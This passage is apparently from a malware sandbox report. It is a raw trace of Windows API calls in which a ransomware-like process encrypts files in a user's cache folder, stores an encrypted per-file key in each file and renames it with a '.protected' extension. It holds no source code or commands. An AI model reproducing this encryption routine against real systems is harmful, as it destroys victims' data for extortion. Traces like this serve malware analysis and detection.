(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.protected")) returned 1 [0088.819] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Windows") returned -1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files") returned -1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="Program Files (x86)") returned -1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="$Recycle.bin") returned 1 [0088.819] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="System Volume Information") returned -1 [0088.819] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.819] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".protected") returned 0x0 [0088.819] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpString2="RESTORE_FILES.txt") returned -1 [0088.819] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.819] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.820] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".txt") returned 0x0 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.820] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".rar") returned 0x0 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 151 [0088.820] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".zip") returned 0x0 [0088.820] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.837] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.837] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.837] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.838] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.838] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.838] CloseHandle (hObject=0x150) returned 1 [0088.838] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected") returned 161 [0088.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.protected")) returned 1 [0088.839] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Windows") returned -1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files") returned -1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="Program Files (x86)") returned -1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="$Recycle.bin") returned 1 [0088.839] lstrcmpiW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="System Volume Information") returned -1 [0088.839] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.839] StrStrIW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".protected") returned 0x0 [0088.839] lstrcmpW (lpString1="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpString2="RESTORE_FILES.txt") returned -1 [0088.839] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.839] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.840] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".txt") returned 0x0 [0088.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.840] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".rar") returned 0x0 [0088.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 151 [0088.840] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".zip") returned 0x0 [0088.840] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x663, lpOverlapped=0x0) returned 1 [0088.883] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff99d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.883] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x663, lpOverlapped=0x0) returned 1 [0088.883] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.883] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.883] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.883] CloseHandle (hObject=0x150) returned 1 [0088.883] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected") returned 161 [0088.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.protected")) returned 1 [0088.884] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Windows") returned -1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="Program Files") returned -1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", 
lpString2="Program Files (x86)") returned -1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="$Recycle.bin") returned 1 [0088.885] lstrcmpiW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="System Volume Information") returned -1 [0088.885] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.885] StrStrIW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".protected") returned 0x0 [0088.885] lstrcmpW (lpString1="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpString2="RESTORE_FILES.txt") returned -1 [0088.885] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.885] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.886] StrStrW 
(lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".txt") returned 0x0 [0088.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.886] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".rar") returned 0x0 [0088.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 151 [0088.886] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".zip") returned 0x0 [0088.886] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x64b, lpOverlapped=0x0) returned 1 [0088.903] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.903] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x64b, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x64b, lpOverlapped=0x0) returned 1 [0088.904] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.904] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.904] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.904] CloseHandle (hObject=0x150) returned 1 [0088.904] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected") returned 161 [0088.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.protected")) returned 1 [0088.905] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Windows") returned -1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files") returned -1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="Program Files (x86)") returned -1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="$Recycle.bin") returned 1 [0088.905] lstrcmpiW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="System Volume Information") returned -1 [0088.905] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.905] StrStrIW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".protected") returned 0x0 [0088.905] lstrcmpW (lpString1="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpString2="RESTORE_FILES.txt") returned -1 [0088.905] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.905] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.906] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".txt") returned 0x0 [0088.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.906] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", 
lpSrch=".rar") returned 0x0 [0088.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0088.906] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".zip") returned 0x0 [0088.906] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x64c, lpOverlapped=0x0) returned 1 [0088.916] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.916] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x64c, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x64c, lpOverlapped=0x0) returned 1 [0088.916] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.916] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.916] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.917] CloseHandle (hObject=0x150) returned 1 [0088.917] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected") returned 161 [0088.917] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.protected")) returned 1 [0088.919] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Windows") returned -1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files") returned -1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="Program Files (x86)") returned -1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="$Recycle.bin") returned 1 [0088.919] lstrcmpiW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="System Volume Information") returned -1 [0088.919] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0088.919] StrStrIW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".protected") returned 0x0 [0088.919] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", 